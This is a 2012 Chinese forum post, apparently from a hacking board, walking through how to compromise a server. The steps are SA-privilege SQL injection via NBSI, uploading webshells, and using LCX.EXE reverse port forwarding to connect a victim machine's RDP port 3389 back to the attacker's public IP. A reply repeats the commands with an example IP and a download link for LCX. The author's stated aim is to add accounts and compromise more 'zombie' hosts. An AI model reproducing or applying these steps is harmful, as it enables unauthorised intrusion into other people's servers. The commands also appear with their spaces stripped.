SA注入和使用LCX内网连内网3389

[复制链接]
查看288 | 回复0 | 2012-4-1 19:18:48 | 显示全部楼层 |阅读模式
最近都在忙着抓135我也从朋友那里得到个自动溢出的程序看起来很诱人!~但是前提是我手上得有服务器因为扫外地135是受到限制的
所以我就准备拿个服务器对一个菜鸟来说拿服务器最简单当然是利用SA的注入了基本什么都能做了就等着连3389了服务器是内网的
我也在内网所以我需要用LCX.EXE(只要服务器在内网就需要用到,个人是内外网区别下文我会说到)
对于SA的注入点我个人比较喜欢NBSI但是我发现有个问题就是他的上传功能不是很理想(我用它传大马就没成功过,传小马也是没加密的才能传上去)所以我就找到了这个站的目录然后偶就传了一个小马再传大马得到shell这个过程很简单然后我用wenshell的上传功能传了一个LCX.EXE接着回来用NBSI去执行命令转发端口首先在自己机子的cmd下运行
lcx.exe-listen513389
意思是监听51端口并转发到3389端口(51的端口可以随便改只要没被占用就OK)
然后在NBSI上运行c:\lcx.exe-slave你的外网IP51肉鸡的内网IP3389
意思是把肉机的3389端口转发到自己的外网IP51端口上
下面就是我遇到的问题了教程上都说我应该连的是127.0.0.1可是我怎么连也连不上出现的错误提示"客户端无法连接。您已连接到这台计算机的控制台。无法建立新的控制台会话"这下我可郁闷了开始我以为是转发端口的问题或者我内网的电脑没有映射到我的外网IP再或者是命令有错误但是因为我这边的监听已经有反映了所以证明错误还是因为我连的IP不对接着我就去连我的内网IP192.168.1.101但是还是一样的错误提示这下我郁闷我又去连我的外网IP60.18.**.**这次出现的提示与上两次不同是"远程计算机连接已超时请从新连接远程计算机"哈哈这证明问题可能解决了所以我就又连了一次果然连上了建立个帐号上去抓鸡喽!
独自等待补:
1、本机CMD运行(首先你要有独立的IP地址,如果是用路由拔号上网,你可以开启DMZ功能)
假设你拔号后获得的IP为:211.112.213.212
lcx.exe-listen513389
2、肉机上运行
c:\lcx.exe-slave你的外网IP51肉鸡的内网IP3389
3、本机上连接你的外网IP
mstsc/v211.112.213.212
LCX下载地址:
http://www.3800hk.com/Soft/gjgj/1761.html
 

*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则